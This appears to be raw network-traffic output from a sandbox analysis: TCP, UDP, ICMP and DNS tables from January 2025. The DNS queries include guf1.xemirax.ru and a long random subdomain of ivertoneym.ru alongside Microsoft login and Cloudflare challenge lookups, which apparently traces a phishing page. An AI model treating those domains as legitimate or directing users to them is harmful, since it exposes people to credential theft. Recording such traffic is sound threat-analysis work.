                                                          Jan 16, 2025 05:17:38.465337992 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.479859114 CET49769443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.479964972 CET44349769104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.480067015 CET49769443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.480254889 CET49769443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.480273962 CET44349769104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.916486025 CET44349738216.58.206.36192.168.2.4
                                                          Jan 16, 2025 05:17:38.916734934 CET44349738216.58.206.36192.168.2.4
                                                          Jan 16, 2025 05:17:38.916913986 CET49738443192.168.2.4216.58.206.36
                                                          Jan 16, 2025 05:17:38.953286886 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.953571081 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.953629971 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.955137968 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.955634117 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.955789089 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.955847025 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.955914021 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.955957890 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.956111908 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.956372023 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.956434011 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.968117952 CET44349769104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.968327999 CET49769443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.968363047 CET44349769104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.969855070 CET44349769104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.970169067 CET49769443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.970606089 CET44349769104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.970901966 CET49769443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.015337944 CET44349769104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.117317915 CET44349769104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.117486000 CET44349769104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.118699074 CET49769443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.119054079 CET49769443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.119080067 CET44349769104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.121687889 CET49738443192.168.2.4216.58.206.36
                                                          Jan 16, 2025 05:17:39.121752024 CET44349738216.58.206.36192.168.2.4
                                                          Jan 16, 2025 05:17:39.201905966 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.202040911 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.202131033 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.202220917 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.202299118 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.202321053 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.202321053 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.202385902 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.202548981 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.202598095 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.202687025 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.202728033 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.202728033 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.202828884 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.203258991 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.206883907 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.207071066 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.207242012 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.207354069 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.249176025 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.294059992 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.294236898 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.294325113 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.294444084 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.294507027 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.294507980 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.294521093 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.294584036 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.294723034 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.295044899 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.295290947 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.295373917 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.295496941 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.295526028 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.309134960 CET49771443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.309223890 CET44349771104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.309319019 CET49771443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.309493065 CET49771443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.309511900 CET44349771104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.764523983 CET44349771104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.764866114 CET49771443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.764904022 CET44349771104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.765392065 CET44349771104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.765815973 CET49771443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.765918970 CET44349771104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.765993118 CET49771443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.811332941 CET44349771104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.895567894 CET44349771104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.895745993 CET44349771104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:39.895803928 CET49771443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.896733046 CET49771443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:39.896771908 CET44349771104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.091845036 CET49772443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:46.091942072 CET44349772104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.092046976 CET49772443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:46.092279911 CET49772443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:46.092298985 CET44349772104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.563283920 CET44349772104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.563601971 CET49772443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:46.563664913 CET44349772104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.565172911 CET44349772104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.565499067 CET49772443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:46.565632105 CET49772443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:46.565644979 CET44349772104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.565751076 CET49772443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:46.565776110 CET49772443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:46.565927982 CET44349772104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.566046000 CET49772443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:46.566097975 CET44349772104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.814996004 CET44349772104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.815174103 CET44349772104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.815238953 CET49772443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:46.815269947 CET44349772104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.815411091 CET44349772104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.815466881 CET49772443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:46.815484047 CET44349772104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.815608025 CET44349772104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.815677881 CET49772443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:46.815845013 CET49772443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:46.815875053 CET44349772104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.825227976 CET49773443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:46.825316906 CET44349773104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.825568914 CET49773443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:46.825680971 CET49773443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:46.825711012 CET44349773104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:46.913430929 CET49774443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:46.913516998 CET44349774104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:46.913825035 CET49774443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:46.913983107 CET49774443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:46.914020061 CET44349774104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:47.284567118 CET44349773104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:47.285032034 CET49773443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:47.285092115 CET44349773104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:47.286468029 CET44349773104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:47.287489891 CET49773443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:47.287575960 CET49773443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:47.287601948 CET44349773104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:47.287731886 CET44349773104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:47.329464912 CET49773443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:47.392561913 CET44349774104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:47.392904997 CET49774443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:47.392966032 CET44349774104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:47.394659996 CET44349774104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:47.394881010 CET49774443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:47.395905018 CET49774443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:47.395905018 CET49774443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:47.395905018 CET49774443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:47.396105051 CET44349774104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:47.396265030 CET49775443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:47.396311998 CET44349775104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:47.396332026 CET49774443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:47.396351099 CET44349774104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:47.396380901 CET49775443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:47.396410942 CET49774443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:47.396579027 CET49775443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:47.396584034 CET44349775104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:47.411581993 CET44349773104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:47.411727905 CET44349773104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:47.411936998 CET49773443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:47.412518978 CET49773443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:47.412580967 CET44349773104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:47.870899916 CET44349775104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:47.871182919 CET49775443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:47.871196985 CET44349775104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:47.872817993 CET44349775104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:47.872895002 CET49775443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:47.873887062 CET49775443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:47.873979092 CET44349775104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:47.874206066 CET49775443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:47.874214888 CET44349775104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:47.918793917 CET49775443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:48.468568087 CET44349775104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:48.468700886 CET44349775104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:48.468775034 CET49775443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:48.469659090 CET49775443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:48.469677925 CET44349775104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:48.572191954 CET49778443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:48.572283030 CET44349778104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:48.572365046 CET49778443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:48.572607040 CET49778443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:48.572630882 CET44349778104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:49.066281080 CET44349778104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:49.066627979 CET49778443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:49.066688061 CET44349778104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:49.068429947 CET44349778104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:49.068617105 CET49778443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:49.068933010 CET49778443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:49.069053888 CET49778443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:49.069097996 CET44349778104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:49.109064102 CET49778443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:49.109123945 CET44349778104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:49.156398058 CET49778443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:49.652030945 CET44349778104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:49.652264118 CET44349778104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:17:49.652458906 CET49778443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:49.716197014 CET49778443192.168.2.4104.21.42.208
                                                          Jan 16, 2025 05:17:49.716259956 CET44349778104.21.42.208192.168.2.4
                                                          Jan 16, 2025 05:18:28.436223030 CET49897443192.168.2.4216.58.206.36
                                                          Jan 16, 2025 05:18:28.436306953 CET44349897216.58.206.36192.168.2.4
                                                          Jan 16, 2025 05:18:28.436408997 CET49897443192.168.2.4216.58.206.36
                                                          Jan 16, 2025 05:18:28.436594963 CET49897443192.168.2.4216.58.206.36
                                                          Jan 16, 2025 05:18:28.436615944 CET44349897216.58.206.36192.168.2.4
                                                          Jan 16, 2025 05:18:29.071569920 CET44349897216.58.206.36192.168.2.4
                                                          Jan 16, 2025 05:18:29.072149992 CET49897443192.168.2.4216.58.206.36
                                                          Jan 16, 2025 05:18:29.072211027 CET44349897216.58.206.36192.168.2.4
                                                          Jan 16, 2025 05:18:29.073698044 CET44349897216.58.206.36192.168.2.4
                                                          Jan 16, 2025 05:18:29.074174881 CET49897443192.168.2.4216.58.206.36
                                                          Jan 16, 2025 05:18:29.074664116 CET44349897216.58.206.36192.168.2.4
                                                          Jan 16, 2025 05:18:29.121995926 CET49897443192.168.2.4216.58.206.36
                                                          Jan 16, 2025 05:18:38.974344015 CET44349897216.58.206.36192.168.2.4
                                                          Jan 16, 2025 05:18:38.974400997 CET44349897216.58.206.36192.168.2.4
                                                          Jan 16, 2025 05:18:38.974666119 CET49897443192.168.2.4216.58.206.36
                                                          Jan 16, 2025 05:18:40.389707088 CET49897443192.168.2.4216.58.206.36
                                                          Jan 16, 2025 05:18:40.389770031 CET44349897216.58.206.36192.168.2.4
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 16, 2025 05:17:24.182611942 CET53534341.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:24.186809063 CET53522751.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:25.206388950 CET53570951.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:28.373337030 CET5904253192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:28.373555899 CET6079553192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:28.380429029 CET53590421.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:28.380471945 CET53607951.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:29.919445038 CET5433853192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:29.919558048 CET6038853192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:29.932346106 CET53543381.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:30.074069977 CET53603881.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:31.072520971 CET5664953192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:31.072735071 CET6141753192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:31.073391914 CET5994653192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:31.073714018 CET5414753192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:31.074210882 CET6118653192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:31.074346066 CET6286953192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:31.079687119 CET53614171.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:31.080044031 CET53566491.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:31.080564976 CET53599461.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:31.082012892 CET53628691.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:31.082041025 CET53541471.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:31.082149029 CET53611861.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:31.818917036 CET5352053192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:31.819047928 CET6003653192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:31.826061964 CET53535201.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:31.826098919 CET53600361.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:31.851682901 CET5169053192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:31.851854086 CET6033753192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:31.858818054 CET53516901.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:31.859082937 CET53603371.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:32.389657974 CET5065453192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:32.389806032 CET5779253192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:32.396382093 CET53506541.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:32.396507025 CET53577921.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:32.401731968 CET5872453192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:32.401928902 CET6488153192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:32.408258915 CET53587241.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:32.408709049 CET53648811.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:34.382926941 CET6243753192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:34.383053064 CET5904253192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:34.389843941 CET53624371.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:34.390101910 CET53590421.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:38.411195993 CET138138192.168.2.4192.168.2.255
                                                          Jan 16, 2025 05:17:42.288024902 CET53589591.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:46.823337078 CET4970353192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:46.823473930 CET5820753192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:46.872303963 CET53582071.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:46.912691116 CET53497031.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:48.481512070 CET4922053192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:48.481657982 CET5013053192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:48.495448112 CET5330753192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:48.495595932 CET5830953192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:48.549345970 CET53533071.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:48.584960938 CET53583091.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:49.535795927 CET5279053192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:49.535926104 CET5080553192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:49.577799082 CET53508051.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:51.725095034 CET6123953192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:51.725229025 CET5344953192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:51.758495092 CET53534491.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:17:52.799504042 CET4944853192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:52.799787045 CET6040553192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:17:57.814532042 CET53619381.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:18:01.099761963 CET53574381.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:18:08.648252010 CET6511253192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:18:08.648423910 CET5175953192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:18:23.802114964 CET53620491.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:18:23.819535017 CET53536391.1.1.1192.168.2.4
                                                          Jan 16, 2025 05:18:34.388942003 CET5004853192.168.2.41.1.1.1
                                                          Jan 16, 2025 05:18:34.389103889 CET5205053192.168.2.41.1.1.1
                                                          TimestampSource IPDest IPChecksumCodeType
                                                          Jan 16, 2025 05:17:30.074358940 CET192.168.2.41.1.1.1c279(Port unreachable)Destination Unreachable
                                                          Jan 16, 2025 05:17:48.585047007 CET192.168.2.41.1.1.1c2ae(Port unreachable)Destination Unreachable
                                                          Jan 16, 2025 05:17:49.577891111 CET192.168.2.41.1.1.1c26b(Port unreachable)Destination Unreachable
                                                          Jan 16, 2025 05:17:51.758569956 CET192.168.2.41.1.1.1c26b(Port unreachable)Destination Unreachable
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 16, 2025 05:17:28.373337030 CET192.168.2.41.1.1.10xb572Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:28.373555899 CET192.168.2.41.1.1.10x95dStandard query (0)www.google.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:29.919445038 CET192.168.2.41.1.1.10x1b91Standard query (0)guf1.xemirax.ruA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:29.919558048 CET192.168.2.41.1.1.10xb30aStandard query (0)guf1.xemirax.ru65IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.072520971 CET192.168.2.41.1.1.10x78b7Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.072735071 CET192.168.2.41.1.1.10xcf03Standard query (0)code.jquery.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.073391914 CET192.168.2.41.1.1.10xaa43Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.073714018 CET192.168.2.41.1.1.10xc491Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.074210882 CET192.168.2.41.1.1.10x3054Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.074346066 CET192.168.2.41.1.1.10x7094Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.818917036 CET192.168.2.41.1.1.10x5f9dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.819047928 CET192.168.2.41.1.1.10xe13cStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.851682901 CET192.168.2.41.1.1.10x1e7eStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.851854086 CET192.168.2.41.1.1.10x62d0Standard query (0)code.jquery.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:32.389657974 CET192.168.2.41.1.1.10x97d6Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:32.389806032 CET192.168.2.41.1.1.10x9b63Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:32.401731968 CET192.168.2.41.1.1.10xcee4Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:32.401928902 CET192.168.2.41.1.1.10xbbb7Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:34.382926941 CET192.168.2.41.1.1.10x674cStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:34.383053064 CET192.168.2.41.1.1.10xfaf5Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:46.823337078 CET192.168.2.41.1.1.10x915fStandard query (0)dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ruA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:46.823473930 CET192.168.2.41.1.1.10xb3f9Standard query (0)dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ru65IN (0x0001)false
                                                          Jan 16, 2025 05:17:48.481512070 CET192.168.2.41.1.1.10x548fStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:48.481657982 CET192.168.2.41.1.1.10x8e8Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:48.495448112 CET192.168.2.41.1.1.10xe4f3Standard query (0)dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ruA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:48.495595932 CET192.168.2.41.1.1.10x1cf7Standard query (0)dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ru65IN (0x0001)false
                                                          Jan 16, 2025 05:17:49.535795927 CET192.168.2.41.1.1.10x898bStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:49.535926104 CET192.168.2.41.1.1.10x62dfStandard query (0)www.office.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:51.725095034 CET192.168.2.41.1.1.10xb4f4Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:51.725229025 CET192.168.2.41.1.1.10x176aStandard query (0)www.office.com65IN (0x0001)false
